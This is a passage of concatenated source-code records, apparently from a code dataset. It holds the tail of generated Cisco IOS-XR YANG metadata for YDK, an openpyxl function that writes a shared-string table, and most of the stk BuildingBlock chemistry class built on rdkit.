''',\n 'type',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'info',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n 'CfgHistGl.RecordType.Record' : {\n 'meta_info' : _MetaInfoClass('CfgHistGl.RecordType.Record',\n False, \n [\n _MetaInfoClassMember('record', ATTRIBUTE, 'int' , None, None, \n [('-2147483648', '2147483647')], [], \n ''' Record\n ''',\n 'record',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', True),\n _MetaInfoClassMember('info', REFERENCE_CLASS, 'Info' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'CfgHistGl.RecordType.Record.Info', \n [], [], \n ''' Content of the history\n ''',\n 'info',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('record-type', REFERENCE_ENUM_CLASS, 'HistRecordEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'HistRecordEnum', \n [], [], \n ''' Record type\n ''',\n 'record_type',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('timestamp', ATTRIBUTE, 'int' , None, None, \n [('0', '4294967295')], [], \n ''' Time stamp for the history\n ''',\n 'timestamp',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'record',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n 'CfgHistGl.RecordType' : {\n 'meta_info' : 
_MetaInfoClass('CfgHistGl.RecordType',\n False, \n [\n _MetaInfoClassMember('record-type', ATTRIBUTE, 'str' , None, None, \n [], ['[\\\\w\\\\-\\\\.:,_@#%$\\\\+=\\\\|;]+'], \n ''' Record type\n ''',\n 'record_type',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', True),\n _MetaInfoClassMember('record', REFERENCE_LIST, 'Record' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'CfgHistGl.RecordType.Record', \n [], [], \n ''' History summary information for a specific type\n of history\n ''',\n 'record',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'record-type',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n 'CfgHistGl' : {\n 'meta_info' : _MetaInfoClass('CfgHistGl',\n False, \n [\n _MetaInfoClassMember('record-type', REFERENCE_LIST, 'RecordType' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'CfgHistGl.RecordType', \n [], [], \n ''' History summary information for a specific type\n of history\n ''',\n 'record_type',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'cfg-hist-gl',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n}\n_meta_table['CfgHistGl.RecordType.Record.Info.AlarmInfo']['meta_info'].parent =_meta_table['CfgHistGl.RecordType.Record.Info']['meta_info']\n_meta_table['CfgHistGl.RecordType.Record.Info.CfscheckInfo']['meta_info'].parent =_meta_table['CfgHistGl.RecordType.Record.Info']['meta_info']\n_meta_table['CfgHistGl.RecordType.Record.Info.CommitInfo']['meta_info'].parent =_meta_table['CfgHistGl.RecordType.Record.Info']['meta_info']\n_meta_table['CfgHistGl.RecordType.Record.Info.OirInfo']['meta_info'].parent =_meta_table['CfgHistGl.RecordType.Record.Info']['meta_info']\n_meta_table['CfgHistGl.RecordType.Record.Info.ShutdownInfo']['meta_info'].parent =_meta_table['CfgHistGl.RecordType.Record.Info']['meta_info']\n_meta_table['CfgHistGl.RecordType.Record.Info.StartupInfo']['meta_info'].parent =_meta_table['CfgHistGl.RecordType.Record.Info']['meta_info']\n_meta_table['CfgHistGl.RecordType.Record.Info.BackupInfo']['meta_info'].parent =_meta_table['CfgHistGl.RecordType.Record.Info']['meta_info']\n_meta_table['CfgHistGl.RecordType.Record.Info']['meta_info'].parent =_meta_table['CfgHistGl.RecordType.Record']['meta_info']\n_meta_table['CfgHistGl.RecordType.Record']['meta_info'].parent =_meta_table['CfgHistGl.RecordType']['meta_info']\n_meta_table['CfgHistGl.RecordType']['meta_info'].parent =_meta_table['CfgHistGl']['meta_info']\n"} {"ext": "py", "sha": "1a2f4274d7daac60ae99f57319b933b10c1b479f", "content": "from __future__ import absolute_import\n# Copyright (c) 2010-2018 openpyxl\n\n\"\"\"Write the shared string table.\"\"\"\nfrom io import BytesIO\n\n# package imports\nfrom openpyxl2.xml.constants import SHEET_MAIN_NS\nfrom openpyxl2.xml.functions import Element, xmlfile, SubElement\n\nPRESERVE_SPACE = '{%s}space' % \"http://www.w3.org/XML/1998/namespace\"\n\ndef write_string_table(string_table):\n \"\"\"Write the string table xml.\"\"\"\n out = BytesIO()\n\n with xmlfile(out) as xf:\n with xf.element(\"sst\", xmlns=SHEET_MAIN_NS, uniqueCount=\"%d\" % len(string_table)):\n\n for key in string_table:\n el = Element('si')\n text = SubElement(el, 't')\n text.text = key\n if key.strip() != key:\n text.set(PRESERVE_SPACE, 'preserve')\n xf.write(el)\n\n return 
out.getvalue()\n"} {"ext": "py", "sha": "1a2f43964d70308be0f37bdf681a3903a890565b", "content": "\"\"\"\nBuilding Block\n==============\n\n\"\"\"\n\nfrom __future__ import annotations\n\nimport logging\nimport os\nimport typing\nimport warnings\nfrom collections.abc import Collection\nfrom functools import partial\n\nimport numpy as np\nimport rdkit.Chem.AllChem as rdkit\nimport vabene\n\nfrom ...utilities import OneOrMany, flatten, remake\nfrom ..atoms import Atom\nfrom ..bonds import Bond\nfrom ..functional_groups import FunctionalGroup, FunctionalGroupFactory\nfrom .molecule import Molecule\n\nlogger = logging.getLogger(__name__)\n\n\nclass BuildingBlock(Molecule):\n \"\"\"\n Represents a building block of a :class:`.ConstructedMolecule`.\n\n A :class:`BuildingBlock` can represent either an entire molecule or\n a molecular fragments used to construct a\n :class:`.ConstructedMolecule`. The building block uses\n :class:`.FunctionalGroup` instances to identify which atoms are\n modified during construction.\n\n \"\"\"\n\n # Maps file extensions to functions which can be used to\n # create an rdkit molecule from that file type.\n _init_funcs = {\n '.mol': partial(\n rdkit.MolFromMolFile,\n sanitize=False,\n removeHs=False\n ),\n\n '.sdf': partial(\n rdkit.MolFromMolFile,\n sanitize=False,\n removeHs=False\n ),\n\n '.pdb': partial(\n rdkit.MolFromPDBFile,\n sanitize=False,\n removeHs=False,\n proximityBonding=False,\n ),\n }\n\n _placer_ids: frozenset[int]\n _core_ids: frozenset[int]\n\n def __init__(\n self,\n smiles: str,\n functional_groups: typing.Iterable[\n typing.Union[FunctionalGroup, FunctionalGroupFactory]\n ] = (),\n placer_ids: typing.Optional[tuple[int, ...]] = None,\n position_matrix: typing.Optional[np.ndarray] = None,\n ) -> None:\n \"\"\"\n Initialize a :class:`.BuildingBlock`.\n\n Notes:\n\n The molecule is given 3D coordinates with\n :func:`rdkit.ETKDGv2`.\n\n Parameters:\n\n smiles:\n A SMILES string of the molecule.\n\n functional_groups:\n An :class:`iterable` of :class:`.FunctionalGroup` or\n :class:`.FunctionalGroupFactory` or both.\n :class:`.FunctionalGroup` instances are added to the\n building block and :class:`.FunctionalGroupFactory`\n instances are used to create :class:`.FunctionalGroup`\n instances the building block should hold.\n :class:`.FunctionalGroup` instances are used to\n identify which atoms are modified during\n :class:`.ConstructedMolecule` construction.\n\n placer_ids:\n The ids of *placer* atoms. These are the atoms which\n should be used for calculating the position of the\n building block. Depending on the values passed to\n `placer_ids`, and the functional groups in the building\n block, different *placer* ids will be used by the\n building block.\n\n #. `placer_ids` is passed to the initializer: the\n passed *placer* ids will be used by the building\n block.\n\n #. `placer_ids` is ``None`` and the building block has\n functional groups: The *placer* ids of the\n functional groups will be used as the *placer* ids\n of the building block.\n\n #. `placer_ids` is ``None`` and `functional_groups` is\n empty. All atoms of the molecule will be used for\n *placer* ids.\n\n position_matrix:\n The position matrix the building block should use. 
If\n ``None``, :func:`rdkit.ETKDGv2` will be used to\n calculate it.\n\n Raises:\n\n :class:`RuntimeError`\n If embedding the molecule fails.\n\n \"\"\"\n\n molecule = rdkit.AddHs(rdkit.MolFromSmiles(smiles))\n if position_matrix is None:\n params = rdkit.ETKDGv2()\n random_seed = 4\n params.randomSeed = random_seed\n if rdkit.EmbedMolecule(molecule, params) == -1:\n raise RuntimeError(\n f'Embedding with seed value of {random_seed} '\n 'failed.'\n )\n rdkit.Kekulize(molecule)\n else:\n # Make sure the position matrix always holds floats.\n position_matrix = np.array(\n position_matrix,\n dtype=np.float64,\n )\n conformer = rdkit.Conformer(molecule.GetNumAtoms())\n for atom_id, position in enumerate(position_matrix):\n conformer.SetAtomPosition(atom_id, position)\n molecule.AddConformer(conformer)\n\n self._init_from_rdkit_mol(\n molecule=molecule,\n functional_groups=functional_groups,\n placer_ids=placer_ids,\n )\n\n @classmethod\n def init_from_molecule(\n cls,\n molecule: Molecule,\n functional_groups: typing.Iterable[\n typing.Union[FunctionalGroup, FunctionalGroupFactory]\n ] = (),\n placer_ids: typing.Optional[tuple[int, ...]] = None,\n ) -> BuildingBlock:\n \"\"\"\n Initialize from a :class:`.Molecule`.\n\n Parameters:\n\n molecule:\n The molecule to initialize from.\n\n functional_groups:\n An :class:`iterable` of :class:`.FunctionalGroup` or\n :class:`.FunctionalGroupFactory` or both.\n :class:`.FunctionalGroup` instances are added to the\n building block and :class:`.FunctionalGroupFactory`\n instances are used to create :class:`.FunctionalGroup`\n instances the building block should hold.\n :class:`.FunctionalGroup` instances are used to\n identify which atoms are modified during\n :class:`.ConstructedMolecule` construction.\n\n placer_ids:\n The ids of *placer* atoms. These are the atoms which\n should be used for calculating the position of the\n building block. Depending on the values passed to\n `placer_ids`, and the functional groups in the\n building block, different *placer* ids will be used by\n the building block.\n\n #. `placer_ids` is passed to the initializer: the\n passed *placer* ids will be used by the building\n block.\n\n #. `placer_ids` is ``None`` and the building block has\n functional groups: The *placer* ids of the\n functional groups will be used as the *placer* ids\n of the building block.\n\n #. `placer_ids` is ``None`` and `functional_groups` is\n empty. All atoms of the molecule will be used for\n *placer* ids.\n\n Returns:\n\n The building block. 
It will have the same atoms, bonds and\n atomic positions as `molecule`.\n\n \"\"\"\n\n return cls.init(\n atoms=tuple(molecule.get_atoms()),\n bonds=tuple(molecule.get_bonds()),\n position_matrix=molecule.get_position_matrix(),\n functional_groups=functional_groups,\n placer_ids=placer_ids,\n )\n\n @classmethod\n def init_from_vabene_molecule(\n cls,\n molecule: vabene.Molecule,\n functional_groups: typing.Iterable[\n typing.Union[FunctionalGroup, FunctionalGroupFactory]\n ] = (),\n placer_ids: typing.Optional[tuple[int, ...]] = None,\n position_matrix: typing.Optional[np.ndarray] = None,\n ) -> BuildingBlock:\n \"\"\"\n Initialize from a :mod:`vabene.Molecule`.\n\n Notes:\n\n The molecule is given 3D coordinates with\n :func:`rdkit.ETKDGv2()`.\n\n Parameters:\n\n molecule:\n The :class:`vabene.Molecule` from which to initialize.\n\n functional_groups:\n An :class:`iterable` of :class:`.FunctionalGroup` or\n :class:`.FunctionalGroupFactory` or both.\n :class:`.FunctionalGroup` instances are added to the\n building block and :class:`.FunctionalGroupFactory`\n instances are used to create :class:`.FunctionalGroup`\n instances the building block should hold.\n :class:`.FunctionalGroup` instances are used to\n identify which atoms are modified during\n :class:`.ConstructedMolecule` construction.\n\n placer_ids:\n The ids of *placer* atoms. These are the atoms which\n should be used for calculating the position of the\n building block. Depending on the values passed to\n `placer_ids`, and the functional groups in the building\n block, different *placer* ids will be used by the\n building block.\n\n #. `placer_ids` is passed to the initializer: the\n passed *placer* ids will be used by the building\n block.\n\n #. `placer_ids` is ``None`` and the building block has\n functional groups: The *placer* ids of the\n functional groups will be used as the *placer* ids\n of the building block.\n\n #. `placer_ids` is ``None`` and `functional_groups` is\n empty. All atoms of the molecule will be used for\n *placer* ids.\n\n position_matrix:\n The position matrix the building block should use. 
If\n ``None``, :func:`rdkit.ETKDGv2` will be used to\n calculate it.\n\n Returns:\n\n The building block.\n\n Raises:\n\n :class:`RuntimeError`\n If embedding the molecule fails.\n\n \"\"\"\n\n editable = rdkit.EditableMol(rdkit.Mol())\n for atom in molecule.get_atoms():\n rdkit_atom = rdkit.Atom(atom.get_atomic_number())\n rdkit_atom.SetFormalCharge(atom.get_charge())\n editable.AddAtom(rdkit_atom)\n\n for bond in molecule.get_bonds():\n editable.AddBond(\n beginAtomIdx=bond.get_atom1_id(),\n endAtomIdx=bond.get_atom2_id(),\n order=rdkit.BondType(bond.get_order()),\n )\n\n rdkit_molecule = editable.GetMol()\n rdkit.SanitizeMol(rdkit_molecule)\n rdkit_molecule = rdkit.AddHs(rdkit_molecule)\n\n if position_matrix is None:\n params = rdkit.ETKDGv2()\n random_seed = 4\n params.randomSeed = random_seed\n if rdkit.EmbedMolecule(rdkit_molecule, params) == -1:\n raise RuntimeError(\n f'Embedding with seed value of {random_seed} '\n 'failed.'\n )\n else:\n # Make sure the position matrix always holds floats.\n position_matrix = np.array(\n position_matrix,\n dtype=np.float64,\n )\n conformer = rdkit.Conformer(rdkit_molecule.GetNumAtoms())\n for atom_id, position in enumerate(position_matrix):\n conformer.SetAtomPosition(atom_id, position)\n rdkit_molecule.AddConformer(conformer)\n\n rdkit.Kekulize(rdkit_molecule)\n return cls.init_from_rdkit_mol(\n molecule=rdkit_molecule,\n functional_groups=functional_groups,\n placer_ids=placer_ids,\n )\n\n @classmethod\n def init(\n cls,\n atoms: tuple[Atom, ...],\n bonds: tuple[Bond, ...],\n position_matrix: np.ndarray,\n functional_groups: typing.Iterable[\n typing.Union[FunctionalGroup, FunctionalGroupFactory]\n ] = (),\n placer_ids: typing.Optional[tuple[int, ...]] = None,\n ) -> BuildingBlock:\n \"\"\"\n Initialize a :class:`.BuildingBlock` from its components.\n\n Parameters:\n\n atoms:\n The atoms of the building block.\n\n bonds:\n The bonds of the building block.\n\n position_matrix:\n An ``(n, 3)`` position matrix of the building block.\n\n functional_groups:\n An :class:`iterable` holding the\n :class:`.FunctionalGroup` instances the building block\n should have, and / or :class:`.FunctionalGroupFactory`\n instances used for creating them.\n\n placer_ids:\n The ids of *placer* atoms. These are the atoms which\n should be used for calculating the position of the\n building block. Depending on the values passed to\n `placer_ids`, and the functional groups in the building\n block, different *placer* ids will be used by the\n building block.\n\n #. `placer_ids` is passed to the initializer: the\n passed *placer* ids will be used by the building\n block.\n\n #. `placer_ids` is ``None`` and the building block has\n functional groups: The *placer* ids of the\n functional groups will be used as the *placer* ids\n of the building block.\n\n #. `placer_ids` is ``None`` and `functional_groups` is\n empty. 
All atoms of the molecule will be used for\n *placer* ids.\n\n Returns:\n\n The building block.\n\n \"\"\"\n\n building_block = cls.__new__(cls)\n Molecule.__init__(\n self=building_block,\n atoms=atoms,\n bonds=bonds,\n position_matrix=position_matrix,\n )\n functional_groups = building_block._extract_functional_groups(\n functional_groups=functional_groups,\n )\n building_block._with_functional_groups(functional_groups)\n building_block._placer_ids = (\n building_block._normalize_placer_ids(\n placer_ids=placer_ids,\n functional_groups=building_block._functional_groups,\n )\n )\n building_block._core_ids = frozenset(\n building_block._get_core_ids(\n functional_groups=building_block._functional_groups,\n )\n )\n return building_block\n\n @classmethod\n def init_from_file(\n cls,\n path: str,\n functional_groups: typing.Iterable[\n typing.Union[FunctionalGroup, FunctionalGroupFactory]\n ] = (),\n placer_ids: typing.Optional[tuple[int, ...]] = None,\n ):\n \"\"\"\n Initialize from a file.\n\n Parameters:\n\n path:\n The path to a molecular structure file. Supported file\n types are:\n\n #. ``.mol``, ``.sdf`` - MDL V3000 MOL file\n\n functional_groups:\n An :class:`iterable` of :class:`.FunctionalGroup` or\n :class:`.FunctionalGroupFactory` or both.\n :class:`.FunctionalGroup` instances are added to the\n building block and :class:`.FunctionalGroupFactory`\n instances are used to create :class:`.FunctionalGroup`\n instances the building block should hold.\n :class:`.FunctionalGroup` instances are used to\n identify which atoms are modified during\n :class:`.ConstructedMolecule` construction.\n\n placer_ids:\n The ids of *placer* atoms. These are the atoms which\n should be used for calculating the position of the\n building block. Depending on the values passed to\n `placer_ids`, and the functional groups in the building\n block, different *placer* ids will be used by the\n building block.\n\n #. `placer_ids` is passed to the initializer: the\n passed *placer* ids will be used by the building\n block.\n\n #. `placer_ids` is ``None`` and the building block has\n functional groups: The *placer* ids of the\n functional groups will be used as the *placer* ids\n of the building block.\n\n #. `placer_ids` is ``None`` and `functional_groups` is\n empty. All atoms of the molecule will be used for\n *placer* ids.\n\n Returns:\n\n The building block.\n\n Raises:\n\n :class:`ValueError`\n If the file type cannot be used for initialization.\n\n \"\"\"\n\n _, extension = os.path.splitext(path)\n\n if extension == '.pdb':\n warnings.warn(\n 'Loading from .pdb files is deprecated and will be '\n 'removed from stk versions released after 1st Nov '\n '2022. Please use .mol files for loading molecules '\n 'instead.',\n category=FutureWarning,\n )\n\n if extension not in cls._init_funcs:\n raise ValueError(\n f'Unable to initialize from \"{extension}\" files.'\n )\n # This remake needs to be here because molecules loaded\n # with rdkit often have issues, because rdkit tries to do\n # bits of structural analysis like stereocenters. 
Remake\n # gets rid of all this problematic metadata.\n molecule = remake(cls._init_funcs[extension](path))\n\n return cls.init_from_rdkit_mol(\n molecule=molecule,\n functional_groups=functional_groups,\n placer_ids=placer_ids,\n )\n\n @classmethod\n def init_from_rdkit_mol(\n cls,\n molecule: rdkit.Mol,\n functional_groups: typing.Iterable[\n typing.Union[FunctionalGroup, FunctionalGroupFactory]\n ] = (),\n placer_ids: typing.Optional[tuple[int, ...]] = None,\n ) -> BuildingBlock:\n \"\"\"\n Initialize from an :mod:`rdkit` molecule.\n\n Warnings:\n\n For :mod:`rdkit` molecules with non-integer bond orders,\n such as 1.5, the molecule should be kekulized prior to\n calling this method. Otherwise, all bond orders will be\n set to an integer value in the building block.\n\n Parameters:\n\n molecule:\n The molecule.\n\n functional_groups:\n An :class:`iterable` of :class:`.FunctionalGroup` or\n :class:`.FunctionalGroupFactory` or both.\n :class:`.FunctionalGroup` instances are added to the\n building block and :class:`.FunctionalGroupFactory`\n instances are used to create :class:`.FunctionalGroup`\n instances the building block should hold.\n :class:`.FunctionalGroup` instances are used to\n identify which atoms are modified during\n :class:`.ConstructedMolecule` construction.\n\n placer_ids:\n The ids of *placer* atoms. These are the atoms which\n should be used for calculating the position of the\n building block. Depending on the values passed to\n `placer_ids`, and the functional groups in the building\n block, different *placer* ids will be used by the\n building block.\n\n #. `placer_ids` is passed to the initializer: the\n passed *placer* ids will be used by the building\n block.\n\n #. `placer_ids` is ``None`` and the building block has\n functional groups: The *placer* ids of the\n functional groups will be used as the *placer* ids\n of the building block.\n\n #. `placer_ids` is ``None`` and `functional_groups` is\n empty. All atoms of the molecule will be used for\n *placer* ids.\n\n Returns:\n\n The molecule.\n\n \"\"\"\n\n building_block = cls.__new__(cls)\n building_block._init_from_rdkit_mol(\n molecule=molecule,\n functional_groups=functional_groups,\n placer_ids=placer_ids,\n )\n return building_block\n\n def _init_from_rdkit_mol(\n self,\n molecule: rdkit.Mol,\n functional_groups: typing.Iterable[\n typing.Union[FunctionalGroup, FunctionalGroupFactory]\n ],\n placer_ids: typing.Optional[tuple[int, ...]],\n ) -> None:\n \"\"\"\n Initialize from an :mod:`rdkit` molecule.\n\n Parameters:\n\n molecule:\n The molecule.\n\n functional_groups:\n An :class:`iterable` of :class:`.FunctionalGroup` or\n :class:`.FunctionalGroupFactory` or both.\n :class:`.FunctionalGroup` instances are added to the\n building block and :class:`.FunctionalGroupFactory`\n instances are used to create :class:`.FunctionalGroup`\n instances the building block should hold.\n :class:`.FunctionalGroup` instances are used to\n identify which atoms are modified during\n :class:`.ConstructedMolecule` construction.\n\n placer_ids:\n The ids of *placer* atoms. These are the atoms which\n should be used for calculating the position of the\n building block. Depending on the values passed to\n `placer_ids`, and the functional groups in the building\n block, different *placer* ids will be used by the\n building block.\n\n #. `placer_ids` is passed to the initializer: the\n passed *placer* ids will be used by the building\n block.\n\n #. 
`placer_ids` is ``None`` and the building block has\n functional groups: The *placer* ids of the\n functional groups will be used as the *placer* ids\n of the building block.\n\n #. `placer_ids` is ``None`` and `functional_groups` is\n empty. All atoms of the molecule will be used for\n *placer* ids.\n\n \"\"\"\n\n atoms = tuple(\n Atom(a.GetIdx(), a.GetAtomicNum(), a.GetFormalCharge())\n for a in molecule.GetAtoms()\n )\n bonds = tuple(\n Bond(\n atom1=atoms[b.GetBeginAtomIdx()],\n atom2=atoms[b.GetEndAtomIdx()],\n order=(\n 9 if b.GetBondType() == rdkit.BondType.DATIVE\n else b.GetBondTypeAsDouble()\n )\n )\n for b in molecule.GetBonds()\n )\n position_matrix = molecule.GetConformer().GetPositions()\n\n super().__init__(atoms, bonds, position_matrix)\n self._with_functional_groups(self._extract_functional_groups(\n functional_groups=functional_groups,\n ))\n self._placer_ids = self._normalize_placer_ids(\n placer_ids=placer_ids,\n functional_groups=self._functional_groups,\n )\n self._core_ids = frozenset(self._get_core_ids(\n functional_groups=self._functional_groups,\n ))\n\n def _normalize_placer_ids(\n self,\n placer_ids: typing.Optional[tuple[int, ...]],\n functional_groups: Collection[FunctionalGroup],\n ) -> frozenset[int]:\n \"\"\"\n Get the final *placer* ids.\n\n Parameters:\n\n placer_ids: The ids of *placer* atoms or ``None``.\n\n functional_groups:\n The :class:`.FunctionalGroup` instances of the building\n block.\n\n Returns:\n\n Depending on the input values, this function will return\n different things.\n\n #. `placer_ids` is a :class:`tuple` of :class`int`: the\n `placer_ids` will be returned.\n\n #. `placer_ids` is ``None`` and `functional_groups` is not\n empty: The *placer* ids of the functional groups will\n be returned.\n\n #. `placer_ids` is ``None`` and `functional_groups` is\n empty. The ids of all atoms in the building block will\n be returned.\n\n \"\"\"\n\n if placer_ids is not None:\n return frozenset(placer_ids)\n\n if functional_groups:\n return frozenset(flatten(\n functional_group.get_placer_ids()\n for functional_group in functional_groups\n ))\n\n return frozenset(atom.get_id() for atom in self._atoms)\n\n def _get_core_ids(\n self,\n functional_groups: typing.Iterable[FunctionalGroup],\n ) -> typing.Iterator[int]:\n \"\"\"\n Get the final *core* ids.\n\n This method may return duplicate ids.\n\n Parameters:\n\n functional_groups:\n The :class:`.FunctionalGroup` instances of the building\n block.\n\n Yields:\n\n The id of an atom defining the core of the molecule.\n\n \"\"\"\n\n functional_group_atom_ids = {\n atom_id\n for functional_group in functional_groups\n for atom_id in functional_group.get_atom_ids()\n }\n for atom in self._atoms:\n atom_id = atom.get_id()\n if atom_id not in functional_group_atom_ids:\n yield atom_id\n\n for functional_group in functional_groups:\n for atom_id in functional_group.get_core_atom_ids():\n yield atom_id\n\n def _extract_functional_groups(\n self,\n functional_groups: typing.Iterable[\n typing.Union[FunctionalGroup, FunctionalGroupFactory]\n ],\n ) -> typing.Iterator[FunctionalGroup]:\n \"\"\"\n Yield functional groups.\n\n The input can be a mixture of :class:`.FunctionalGroup` and\n :class:`.FunctionalGroupFactory`. The output yields\n :class:`.FunctionalGroup` instances only. 
Either those\n held directly in `functional_groups` or created by the\n factories in `functional_groups`.\n\n Parameters:\n\n functional_groups:\n Can be an :class:`iterable` of both\n :class:`.FunctionalGroup` and\n :class:`.FunctionalGroupFactory`.\n\n Yields:\n\n A functional group from `functional_groups`, or created\n by a factory in `functional_groups`.\n\n \"\"\"\n\n for functional_group in functional_groups:\n if isinstance(functional_group, FunctionalGroup):\n yield functional_group\n else:\n # Else it's a factory.\n yield from functional_group.get_functional_groups(self)\n\n def _with_functional_groups(\n self,\n functional_groups: typing.Iterable[FunctionalGroup],\n ) -> BuildingBlock:\n \"\"\"\n Modify the molecule.\n\n \"\"\"\n\n self._functional_groups = tuple(functional_groups)\n return self\n\n def with_functional_groups(\n self,\n functional_groups: typing.Iterable[FunctionalGroup],\n ) -> BuildingBlock:\n \"\"\"\n Return a clone with specific functional groups.\n\n Parameters:\n\n functional_groups:\n :class:`.FunctionalGroup` instances which the clone\n should have.\n\n Returns:\n\n The clone.\n\n \"\"\"\n\n return self.clone()._with_functional_groups(functional_groups)\n\n def _with_canonical_atom_ordering(self) -> BuildingBlock:\n ordering = rdkit.CanonicalRankAtoms(self.to_rdkit_mol())\n super()._with_canonical_atom_ordering()\n id_map = {\n old_id: new_id\n for old_id, new_id in enumerate(ordering)\n }\n self._functional_groups = tuple(\n functional_group.with_ids(id_map)\n for functional_group in self._functional_groups\n )\n self._placer_ids = frozenset(\n id_map[placer_id]\n for placer_id in self._placer_ids\n )\n self._core_ids = frozenset(\n id_map[core_id]\n for core_id in self._core_ids\n )\n return self\n\n def get_num_functional_groups(self) -> int:\n \"\"\"\n Return the number of functional groups.\n\n Returns:\n\n The number of functional groups in the building block.\n\n \"\"\"\n\n return len(self._functional_groups)\n\n def get_functional_groups(\n self,\n fg_ids: typing.Optional[OneOrMany[int]] = None,\n ) -> typing.Iterator[FunctionalGroup]:\n \"\"\"\n Yield the functional groups, ordered by id.\n\n Parameters:\n\n fg_ids:\n The ids of functional groups yielded. If ``None``, then\n all functional groups are yielded. 
Can be a single\n :class:`int`, if a single functional group is\n desired.\n\n Yields:\n\n A functional group of the building block.\n\n \"\"\"\n\n if fg_ids is None:\n fg_ids = range(len(self._functional_groups))\n elif isinstance(fg_ids, int):\n fg_ids = (fg_ids, )\n\n for fg_id in fg_ids:\n yield self._functional_groups[fg_id]\n\n def clone(self) -> BuildingBlock:\n clone = self._clone()\n clone._functional_groups = self._functional_groups\n clone._placer_ids = self._placer_ids\n clone._core_ids = self._core_ids\n return clone\n\n def get_num_placers(self) -> int:\n \"\"\"\n Return the number of *placer* atoms in the building block.\n\n Returns:\n\n The number of *placer* atoms in the building block.\n\n \"\"\"\n\n return len(self._placer_ids)\n\n def get_placer_ids(self) -> typing.Iterator[int]:\n \"\"\"\n Yield the ids of *placer* atoms.\n\n *Placer* atoms are those, which should be used to calculate\n the position of the building block.\n\n See Also:\n\n :meth:`.FunctionalGroup.get_placer_ids`\n\n Yields:\n\n The id of a *placer* atom.\n\n \"\"\"\n\n yield from self._placer_ids\n\n def get_core_atom_ids(self) -> typing.Iterator[int]:\n \"\"\"\n Yield ids of atoms which form the core of the building block.\n\n This includes all atoms in the building block not part of a\n functional group, as well as any atoms in a functional group,\n specifically labelled as core atoms.\n\n See Also:\n\n :meth:`.FunctionalGroup.get_core_atom_ids`\n\n Yields:\n\n The id of a *core* atom.\n\n\n \"\"\"\n\n yield from self._core_ids\n\n def with_canonical_atom_ordering(self) -> BuildingBlock:\n return self.clone()._with_canonical_atom_ordering()\n\n def with_centroid(\n self,\n position: np.ndarray,\n atom_ids: typing.Optional[OneOrMany[int]] = None,\n ) -> BuildingBlock:\n\n return self.clone()._with_centroid(position, atom_ids)\n\n def with_displacement(\n self,\n displacement: np.ndarray,\n ) -> BuildingBlock:\n\n return self.clone()._with_displacement(displacement)\n\n def with_position_matrix(\n self,\n position_matrix: np.ndarray,\n ) -> BuildingBlock:\n\n return self.clone()._with_position_matrix(position_matrix)\n\n def with_rotation_about_axis(\n self,\n angle: float,\n axis: np.ndarray,\n origin: np.ndarray,\n ) -> BuildingBlock:\n\n return self.clone()._with_rotation_about_axis(\n angle=angle,\n axis=axis,\n origin=origin,\n )\n\n def with_rotation_between_vectors(\n self,\n start: np.ndarray,\n target: np.ndarray,\n origin: np.ndarray,\n ) -> BuildingBlock:\n\n return self.clone()._with_rotation_between_vectors(\n start=start,\n target=target,\n origin=origin,\n )\n\n def with_rotation_to_minimize_angle(\n self,\n start: np.ndarray,\n target: np.ndarray,\n axis: np.ndarray,\n origin: np.ndarray,\n ) -> BuildingBlock:\n\n return self.clone()._with_rotation_to_minimize_angle(\n start=start,\n target=target,\n axis=axis,\n origin=origin,\n )\n\n def with_structure_from_file(\n self,\n path: str,\n extension: typing.Optional[str] = None,\n ) -> BuildingBlock:\n\n return typing.cast(\n BuildingBlock,\n super().with_structure_from_file(\n path=path,\n extension=extension,\n )\n )\n\n def write(\n self,\n path: str,\n atom_ids: typing.Optional[OneOrMany[int]] = None,\n ) -> BuildingBlock:\n\n return typing.cast(\n BuildingBlock,\n super().write(path, atom_ids)\n )\n\n def __str__(self) -> str:\n if self._functional_groups:\n fg_repr = f', {self._functional_groups!r}'\n else:\n fg_repr = ''\n\n smiles = rdkit.MolToSmiles(\n mol=rdkit.RemoveHs(self.to_rdkit_mol()),\n )\n return 
